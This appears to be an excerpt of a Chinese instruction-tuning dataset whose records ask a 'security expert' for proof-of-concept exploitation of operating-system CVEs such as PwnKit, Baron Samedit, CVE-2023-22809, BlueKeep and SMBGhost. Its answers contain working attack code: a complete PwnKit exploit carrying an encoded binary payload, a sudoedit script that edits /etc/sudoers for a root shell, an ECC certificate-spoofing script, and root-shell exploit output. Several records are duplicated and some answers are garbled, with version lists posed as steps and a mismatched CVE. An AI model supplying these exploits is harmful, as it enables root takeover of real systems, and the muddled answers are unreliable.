  509. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows SMB 远程代码执行漏洞 CVE-2020-0796\n漏洞描述:2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码\n影响版本:``` SMB版本 v3.1.1 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation) ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2020-0796\n【POC利用方法】\n1. SMB版本 v3.1.1\n\nWindows 10 Version 1903 for 32-bit Systems\nWindows 10 Version 1903 for x64-based Systems\nWindows 10 Version 1903 for ARM64-based Systems\nWindows Server, Version 1903 (Server Core installation)\nWindows 10 Version 1909 for 32-bit Systems\nWindows 10 Version 1909 for x64-based Systems\nWindows 10 Version 1909 for ARM64-based Systems\nWindows Server, Version 1909 (Server Core installation)\n2. OriginalSize :0xffffffff\nOffset:0x10\nReal compressed data :13字节的压缩数据,解压后应为1108字节’A’加8字节的token地址。\nSMB3 raw data :实际上是由2个8字节的0x1FF2FFFFBC(总长0x10)加上0x13字节的压缩数据组成\n3. SmbCompressionDecompress(CompressAlgo,//压缩算法\nCompressed_buf,//指向数据包中的压缩数据\nCompressed_size,//数据包中压缩数据大小,计算得到\nUnCompressedBuf,//解压后的数据存储地址,*(alloc_buffer+0x18)+0x10\nUnCompressedSize,//压缩数据原始大小,源于数据包OriginalCompressedSegmentSize\nFinalUnCompressedSize)//最终解压后数据大小\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Windows SMB 远程代码执行漏洞 CVE-2020-0796.md"}
    510. 

  510. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux sudo 权限提升漏洞 CVE-2021-3156\n漏洞描述:2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的root权限,包括Ubuntu 20.04(sudo 1.8.31)、Debian 10(sudo 1.8.27)和Fedora 33(sudo 1.9.2),并且sudo支持的其他操作系统和Linux发行版也很容易受到攻击。\n影响版本:``` Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2021-3156\n【POC利用方法】\n1. Sudo 1.8.2 - 1.8.31p2\nSudo 1.9.0 - 1.9.5p1\n2. Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31  Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28\n3. all:\n\trm -rf libnss_X\n\tmkdir libnss_X\n\tgcc -std=c99 -o sudo-hax-me-a-sandwich hax.c\n\tgcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c\nbrute: all\n\tgcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c\nclean:\n\trm -rf libnss_X sudo-hax-me-a-sandwich\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux sudo 权限提升漏洞 CVE-2021-3156.md"}
    511. 

  511. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows远程桌面服务漏洞 CVE-2019-0708\n漏洞描述:2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。\n影响版本:该漏洞影响旧版本的Windows系统,包括: ``` Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP ``` Windows 8和Windows 10及之后版本不受此漏洞影响。\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2019-0708\n【POC利用方法】\n1. Windows 7\nWindows Server 2008 R2\nWindows Server 2008\nWindows 2003\nWindows XP\n2. /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb\n\n/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb\n\n/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb\n3. Windows2008 R2 x64 需要修改[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\TerminalServer\\WinStations\\rdpwd\\fDisableCam]值为0。\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Windows远程桌面服务漏洞 CVE-2019-0708.md"}
    512. 

  512. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux sudo权限提升漏洞 CVE-2021-3156\n漏洞描述:2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的root权限,包括Ubuntu 20.04(sudo 1.8.31)、Debian 10(sudo 1.8.27)和Fedora 33(sudo 1.9.2),并且sudo支持的其他操作系统和Linux发行版也很容易受到攻击。\n影响版本:``` Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2021-3156\n【POC利用方法】\n1. Sudo 1.8.2 - 1.8.31p2\nSudo 1.9.0 - 1.9.5p1\n2. Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31  Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28\n3. all:\n\trm -rf libnss_X\n\tmkdir libnss_X\n\tgcc -std=c99 -o sudo-hax-me-a-sandwich hax.c\n\tgcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c\nbrute: all\n\tgcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c\nclean:\n\trm -rf libnss_X sudo-hax-me-a-sandwich\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux sudo权限提升漏洞 CVE-2021-3156.md"}
    513. 

  513. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows CryptoAPI欺骗漏洞 CVE-2020-0601\n漏洞描述:1月15日,微软发布了针对CVE-2020-0601的安全补丁,该漏洞是微软在实现椭圆曲线加密算法数字证书验证时产生,可被利用于伪造来自可信任来源的签名或证书,并且因其业务特性会衍生出多种攻击向量,具有极高的可利用价值和极大的潜在破坏力,Win 10和windows server 2016 & 2019也都在其影响范围内。该漏洞由美国NSA国家安全局发现后汇报给微软公司,也被认为是第一个NSA公开披露的软件系统漏洞,当然也有可能存在其特殊的战术目的。绿盟科技M01N攻击安全研究团队对此漏洞原理进行了详细分析并复现了多种可能的攻击方法,提出了详细的检测及整改方案。\n影响版本:``` 带有指定参数的ECC密钥的证书的Microsoft Windows版本 依赖于Windows CryptoAPI的应用程序 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2020-0601\n【POC利用方法】\n1. 带有指定参数的ECC密钥的证书的Microsoft Windows版本\n依赖于Windows CryptoAPI的应用程序\n2. require 'openssl'\n\nraw = File.read ARGV[0]     # 读取使用ECC算法的证书文件\nca = OpenSSL::X509::Certificate.new(raw)    # 读取使用ECC算法的证书\nca_key = ca.public_key  # 从证书中提取公钥ca_key\n\nca_key.private_key = 1  # 设置私钥为1,使得公钥K==1*基点G的等式成立\ngroup = ca_key.group \ngroup.set_generator(ca_key.public_key, group.order, group.cofactor)\ngroup.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE\nca_key.group = group        # 利用构建的假基点G和假密钥k设置新group\nFile.open(\"spoofed_ca.key\", 'w') { |f| f.write ca_key.to_pem }  # 将新的group写入文件\n3. 虽然椭圆曲线加密算法具有着许多优势,纯算法角度破解难度极大,微软对此算法的实现的缺漏却给漏洞利用提供了可乘之机。回到椭圆曲线加密最基本的等式 K=kG,首先需要明确的是,虽然对于给定的基点G和公钥K,要求解私钥k很困难,但是如果可以任意指定基点G,要构造一对k和G使等式成立却极其简单;最简单的情况,令基点G=K,则私钥k=1,这样一对基点和私钥可以使等式成立,也是有效的解。\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Windows CryptoAPI欺骗漏洞 CVE-2020-0601.md"}
    514. 

  514. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux Sudo权限提升漏洞 CVE-2023-22809\n漏洞描述:Sudo 存在权限提升漏洞,攻击者可过特定的 payload 获取服务器 root 权限。 Sudo 中的 sudoedit 对处理用户提供的环境变量(如`SUDO_EDITOR`、`VISUAL`和`EDITOR`)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过 sudoers 策略的 \" –\" 参数时,拥有sudoedit 访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升。该漏洞还影响部分 QNAP 操作系统:QTS、QuTS hero、QuTScloud、QVP(QVR Pro 设备)。\n影响版本:``` Sudo: 1.8.0~1.9.12p1 均受影响 QTS 与 QuTS hero: QTS < 5.0.1.2346 build 20230322 QuTS < hero h5.0.1.2348 build 20230324 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2023-22809\n【POC利用方法】\n1. Sudo:\n1.8.0~1.9.12p1 均受影响\n\nQTS 与 QuTS hero:\nQTS < 5.0.1.2346 build 20230322\nQuTS < hero h5.0.1.2348 build 20230324\n2. #!/usr/bin/env bash\n#\n# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation\n# \n# Exploit Author: n3m1.sys\n# CVE: CVE-2023-22809\n# Date: 2023/01/21\n# Vendor Homepage: https://www.sudo.ws/\n# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz\n# Version: 1.8.0 to 1.9.12p1\n# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9\n#\n# Running this exploit on a vulnerable system allows a localiattacker to gain \n# a root shell on the machine.\n#\n# The exploit checks if the current user has privileges to run sudoedit or \n# sudo -e on a file as root. If so it will open the sudoers file for the\n# attacker to add a line to gain privileges on all the files and get a root \n# shell.\n\nif ! sudo --version | head -1 | grep -qE '(1\\.8.*|1\\.9\\.[0-9]1?(p[1-3])?|1\\.9\\.12p1)$'\nthen\n    echo \"> Currently installed sudo version is not vulnerable\"\n    exit 1\nfi\n\nEXPLOITABLE=$(sudo -l | grep -E \"sudoedit|sudo -e\" | grep -E '\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)' | cut -d ')' -f 2-)\n\nif [ -z \"$EXPLOITABLE\" ]; then\n    echo \"> It doesn't seem that this user can run sudoedit as root\"\n    read -p \"Do you want to proceed anyway? (y/N): \" confirm && [[ $confirm == [yY] ]] || exit 2\nelse\n    echo \"> BINGO! User exploitable\"\nfi\n\necho \"> Opening sudoers file, please add the following line to the file in order to do the privesc:\"\necho \"$USER ALL=(ALL:ALL) ALL\"\nread -n 1 -s -r -p \"Press any key to continue...\"\nEDITOR=\"vim -- /etc/sudoers\" $EXPLOITABLE\nsudo su root\nexit 0\n3. Defaults!SUDOEDIT env_delete+=\"SUDO_EDITOR VISUAL EDITOR\"\nCmnd_Alias SUDOEDIT = sudoedit /etc/custom/service.conf\nuser ALL=(ALL:ALL) SUDOEDIT\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux sudo权限提升漏洞 CVE-2023-22809.md"}
    515. 

  515. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux openvswitch 权限提升漏洞 CVE-2022-2639\n漏洞描述:由于 openvswitch 模块在处理大量actions的情况下,可能存在越界写入漏洞,本地经过身份认证的攻击者可利用此漏洞获取root权限\n影响版本:``` 3.13 ≤ Linux Kernel < 5.18 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2022-2639\n【POC利用方法】\n1. 3.13 ≤ Linux Kernel < 5.18\n2. 编译POC并运行获取Root权限\n3. https://github.com/avboy1337/CVE-2022-2639-PipeVersion\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux openvswitch 权限提升漏洞 CVE-2022-2639.md"}
    516. 

  516. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux eBPF权限提升漏洞 CVE-2022-23222\n漏洞描述:Linux Kernel 是美国 Linux 基金会发布的开源操作系统 Linux 所使用的内核。Linux 内核是一种开源的类Unix 操作系统宏内核。整个 Linux 操作系统家族基于该内核部署在传统计算机平台(如个人计算机和服务器)。该漏洞是由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限\n影响版本:``` Linux 5.8 - 5.16(在5.10.92 / 5.15.15 / 5.16.1中修复) ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2022-23222\n【POC利用方法】\n1. Linux 5.8 - 5.16(在5.10.92 / 5.15.15 / 5.16.1中修复)\n2. $ make\ncc -I include -static -w -o exploit exploit.c\n$ ./exploit \n[*] phase(1/8) 'create bpf map(s)' running\n[+] phase(1/8) 'create bpf map(s)' done\n[*] phase(2/8) 'do some leak' running\n[+] phase(2/8) 'do some leak' done\n[*] phase(3/8) 'prepare arbitrary rw' running\n[+] phase(3/8) 'prepare arbitrary rw' done\n[*] phase(4/8) 'spawn processes' running\n[+] phase(4/8) 'spawn processes' done\n[*] phase(5/8) 'find cred (slow)' running\n[+] phase(5/8) 'find cred (slow)' done\n[*] phase(6/8) 'overwrite cred' running\n[+] phase(6/8) 'overwrite cred' done\n[*] phase(7/8) 'spawn root shell' running\n[+] Enjoy root!\n# id\nuid=0(root) gid=0(root) groups=65534(nobody)\n# exit\n[+] phase(7/8) 'spawn root shell' done\n[*] phase(8/8) 'clean up the mess' running\n[+] phase(8/8) 'clean up the mess' done\n3. [*] phase(1/8) 'create bpf map(s)' running\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md"}
    517. 

  517. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows SMB远程代码执行漏洞 CVE-2020-0796\n漏洞描述:2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码\n影响版本:``` SMB版本 v3.1.1 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation) ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2020-0796\n【POC利用方法】\n1. SMB版本 v3.1.1\n\nWindows 10 Version 1903 for 32-bit Systems\nWindows 10 Version 1903 for x64-based Systems\nWindows 10 Version 1903 for ARM64-based Systems\nWindows Server, Version 1903 (Server Core installation)\nWindows 10 Version 1909 for 32-bit Systems\nWindows 10 Version 1909 for x64-based Systems\nWindows 10 Version 1909 for ARM64-based Systems\nWindows Server, Version 1909 (Server Core installation)\n2. OriginalSize :0xffffffff\nOffset:0x10\nReal compressed data :13字节的压缩数据,解压后应为1108字节’A’加8字节的token地址。\nSMB3 raw data :实际上是由2个8字节的0x1FF2FFFFBC(总长0x10)加上0x13字节的压缩数据组成\n3. SmbCompressionDecompress(CompressAlgo,//压缩算法\nCompressed_buf,//指向数据包中的压缩数据\nCompressed_size,//数据包中压缩数据大小,计算得到\nUnCompressedBuf,//解压后的数据存储地址,*(alloc_buffer+0x18)+0x10\nUnCompressedSize,//压缩数据原始大小,源于数据包OriginalCompressedSegmentSize\nFinalUnCompressedSize)//最终解压后数据大小\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Windows SMB远程代码执行漏洞 CVE-2020-0796.md"}
    518. 

  518. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows Win32k 本地提权漏洞 CVE-2021-1732\n漏洞描述:2021年2月10日,微软每月的例行补丁包中修复了一个Windows系统本地提权漏洞,本地攻击者可以利用此漏洞提升到system权限,据称此漏洞被用于定向攻击活动。 奇安信息威胁情报中心红雨滴团队第一时间跟进该漏洞并确认其可用性,漏洞相应的利用程序已经公开,有可能被改造来执行大范围的攻击,已经构成现实的威胁。目前微软已经修补了此漏洞,奇安信息威胁情报中心提醒相关用户及时安装2月补丁。\n影响版本:``` Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Version 20H2 for x64-based Systems Windows Server, version 2004 (Server Core installation) Windows 10 Version 2004 for x64-based Systems Windows 10 Version 2004 for ARM64-based Systems Windows 10 Version 2004 for 32-bit Systems Windows Server, version 1909 (Server Core installation) Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows Server 2019 (Server Core installation) Windows Server 2019 Windows 10 Version 1809 for ARM64-based Systems Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Version 1803 for x64-based Systems ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2021-1732\n【POC利用方法】\n1. Windows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1803 for x64-based Systems\n2. CVE-2021-1723 whoami\n3. **Github公开地址:**[**https://github.com/KaLendsi/CVE-2021-1732-Exploit**](https://github.com/KaLendsi/CVE-2021-1732-Exploit)\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Windows Win32k 本地提权漏洞 CVE-2021-1732.md"}
    519. 

  519. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows 远程桌面服务漏洞 CVE-2019-0708\n漏洞描述:2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。\n影响版本:该漏洞影响旧版本的Windows系统,包括: ``` Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP ``` Windows 8和Windows 10及之后版本不受此漏洞影响。\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2019-0708\n【POC利用方法】\n1. Windows 7\nWindows Server 2008 R2\nWindows Server 2008\nWindows 2003\nWindows XP\n2. /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb\n\n/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb\n\n/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb\n3. Windows2008 R2 x64 需要修改[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\TerminalServer\\WinStations\\rdpwd\\fDisableCam]值为0。\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Windows 远程桌面服务漏洞 CVE-2019-0708.md"}
    520. 

  520. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux Polkit权限提升漏洞 CVE-2021-4034\n漏洞描述:Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。\n影响版本:``` Polkit > 2009 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2021-4034\n【POC利用方法】\n1. Polkit > 2009\n2. #!/usr/bin/env python3\n\n# poc for https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt found by qualys\n# hardcoded amd64 lib\nfrom ctypes import *\nfrom ctypes.util import find_library\nimport os\nimport zlib\nimport base64\nimport tempfile\n\npayload = zlib.decompress(\n    base64.b64decode(\n        \"\"\"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\"\"\"\n    )\n)\nlibc = CDLL(find_library(\"c\"))\nlibc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)\nlibc.execve.restype = c_ssize_t\n\nwd = tempfile.mkdtemp()\nopen(wd + \"/pwn.so\", \"wb\").write(payload)\nos.mkdir(wd + \"/gconv/\")\nopen(wd + \"/gconv/gconv-modules\", \"w\").write(\n    \"module  UTF-8//    INTERNAL    ../pwn    2\"\n)\nos.mkdir(wd + \"/GCONV_PATH=.\")\nos.mknod(wd + \"/GCONV_PATH=./gconv\")\nos.chmod(wd + \"/GCONV_PATH=.\", 0o777)\nos.chmod(wd + \"/GCONV_PATH=./gconv\", 0o777)\nos.chmod(wd + \"/pwn.so\", 0o777)\nos.chdir(wd)\ncmd = b\"/usr/bin/pkexec\"\nargv = []\nenvp = [\n    b\"gconv\",\n    b\"PATH=GCONV_PATH=.\",\n    b\"LC_MESSAGES=en_US.UTF-8\",\n    b\"XAUTHORITY=../gconv\",\n    b\"\",\n]\n\ncargv = (c_char_p * (len(argv) + 1))(*argv, None)\ncenv = (c_char_p * (len(envp) + 1))(*envp, None)\nlibc.execve(cmd, cargv, cenv)\n3. wd = tempfile.mkdtemp()\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux Polkit权限提升漏洞 CVE-2021-4034.md"}
    521. 

